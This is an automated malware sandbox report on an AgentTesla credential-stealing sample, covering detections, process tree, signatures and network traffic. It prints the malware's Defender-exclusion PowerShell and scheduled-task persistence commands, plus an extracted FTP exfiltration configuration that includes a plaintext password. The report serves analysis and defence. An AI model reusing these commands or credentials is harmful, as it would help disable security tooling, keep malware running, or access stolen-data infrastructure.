Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hesaphareketi-.exe

Overview

General Information

Sample name:hesaphareketi-.exe
Analysis ID:1463493
MD5:d8aa0c3eaed283b8d78298748900f395
SHA1:9899cc61cb992dcfe49a04f4a4209852713b4ab5
SHA256:ce51bc85fa9cf4a581de693c5901e0c03fff712c40f723009e393bad1a18d014
Tags:AgentTeslaexegeoTUR
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hesaphareketi-.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: D8AA0C3EAED283B8D78298748900F395)
    • powershell.exe (PID: 3524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5800 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 2780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7096 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hesaphareketi-.exe (PID: 5300 cmdline: "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: D8AA0C3EAED283B8D78298748900F395)
  • xyodEPhulIrkY.exe (PID: 2828 cmdline: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe MD5: D8AA0C3EAED283B8D78298748900F395)
    • schtasks.exe (PID: 4724 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xyodEPhulIrkY.exe (PID: 1628 cmdline: "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe" MD5: D8AA0C3EAED283B8D78298748900F395)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 17 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.hesaphareketi-.exe.3474e08.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.hesaphareketi-.exe.3474e08.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.hesaphareketi-.exe.3474e08.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3122b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3129d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x31327:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x313b9:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x31423:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31495:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3152b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x315bb:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.hesaphareketi-.exe.3474e08.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x2e6ae:$s2: GetPrivateProfileString
                  • 0x2dd58:$s3: get_OSFullName
                  • 0x2f3ea:$s5: remove_Key
                  • 0x2f58f:$s5: remove_Key
                  • 0x30458:$s6: FtpWebRequest
                  • 0x3120d:$s7: logins
                  • 0x3177f:$s7: logins
                  • 0x34490:$s7: logins
                  • 0x34542:$s7: logins
                  • 0x35e3e:$s7: logins
                  • 0x350dc:$s9: 1.85 (Hash, version 2, native byte-order)
                  9.2.xyodEPhulIrkY.exe.3645378.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 31 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 6516, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", ProcessId: 3524, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 6516, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", ProcessId: 3524, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, ParentImage: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, ParentProcessId: 2828, ParentProcessName: xyodEPhulIrkY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp", ProcessId: 4724, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 6516, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp", ProcessId: 7096, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 6516, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", ProcessId: 3524, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 6516, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp", ProcessId: 7096, ProcessName: schtasks.exe

                    Snort Signatures

                    Timestamp:06/27/24-09:16:46.163921
                    SID:2855542
                    Source Port:49706
                    Destination Port:62377
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/27/24-09:16:49.864211
                    SID:2851779
                    Source Port:49708
                    Destination Port:51041
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/27/24-09:16:49.864211
                    SID:2855542
                    Source Port:49708
                    Destination Port:51041
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/27/24-09:16:46.163921
                    SID:2851779
                    Source Port:49706
                    Destination Port:62377
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/27/24-09:16:49.222300
                    SID:2029927
                    Source Port:49707
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/27/24-09:16:45.532746
                    SID:2029927
                    Source Port:49705
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: hesaphareketi-.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://ftp.normagroup.com.trAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeAvira: detection malicious, Label: HEUR/AGEN.1363658
                    Found malware configuration
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeReversingLabs: Detection: 52%
                    Multi AV Scanner detection for submitted file
                    Source: hesaphareketi-.exeReversingLabs: Detection: 52%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: hesaphareketi-.exeJoe Sandbox ML: detected
                    Source: hesaphareketi-.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: hesaphareketi-.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.5:49705 -> 104.247.165.99:21
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49706 -> 104.247.165.99:62377
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49706 -> 104.247.165.99:62377
                    Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.5:49707 -> 104.247.165.99:21
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49708 -> 104.247.165.99:51041
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49708 -> 104.247.165.99:51041
                    Source: global trafficTCP traffic: 192.168.2.5:49706 -> 104.247.165.99:62377
                    Source: Joe Sandbox ViewIP Address: 104.247.165.99 104.247.165.99
                    Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                    Source: unknownFTP traffic detected: 104.247.165.99:21 -> 192.168.2.5:49705 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 10:16. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 10:16. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 10:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 10:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: ftp.normagroup.com.tr
                    Source: hesaphareketi-.exe, 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000008.00000002.4492018819.000000000305C000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 0000000D.00000002.4492600143.0000000002D0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.normagroup.com.tr
                    Source: hesaphareketi-.exe, 00000000.00000002.2067164468.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 00000009.00000002.2098714484.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: hesaphareketi-.exe, 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, oAKy.cs.Net Code: _5754M2
                    Source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, oAKy.cs.Net Code: _5754M2
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\hesaphareketi-.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: hesaphareketi-.exe, --.csLarge array initialization: _0002: array initializer size 576863
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_0229E02C0_2_0229E02C
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_049B72100_2_049B7210
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_049B83300_2_049B8330
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_049B6E680_2_049B6E68
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_049B86580_2_049B8658
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_049B77580_2_049B7758
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_049B00070_2_049B0007
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_049B00400_2_049B0040
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_049B71FE0_2_049B71FE
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_049B724A0_2_049B724A
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 0_2_049B83D10_2_049B83D1
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_017094008_2_01709400
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_01709BB88_2_01709BB8
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_01704A608_2_01704A60
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_01703E488_2_01703E48
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_0170CE388_2_0170CE38
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_017041908_2_01704190
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_065A2EF88_2_065A2EF8
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_065A56B88_2_065A56B8
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_065A3F288_2_065A3F28
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_065ADC008_2_065ADC00
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_065ABCD08_2_065ABCD0
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_065A8B628_2_065A8B62
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_065A00408_2_065A0040
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_065A36308_2_065A3630
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_065A4FD88_2_065A4FD8
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_066EF0E88_2_066EF0E8
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_066E11288_2_066E1128
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_066E11228_2_066E1122
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_00B2E02C9_2_00B2E02C
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04BA72109_2_04BA7210
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04BA83209_2_04BA8320
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04BA6E689_2_04BA6E68
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04BA86589_2_04BA8658
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04BA77589_2_04BA7758
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04BA00069_2_04BA0006
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04BA00409_2_04BA0040
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04BA71FE9_2_04BA71FE
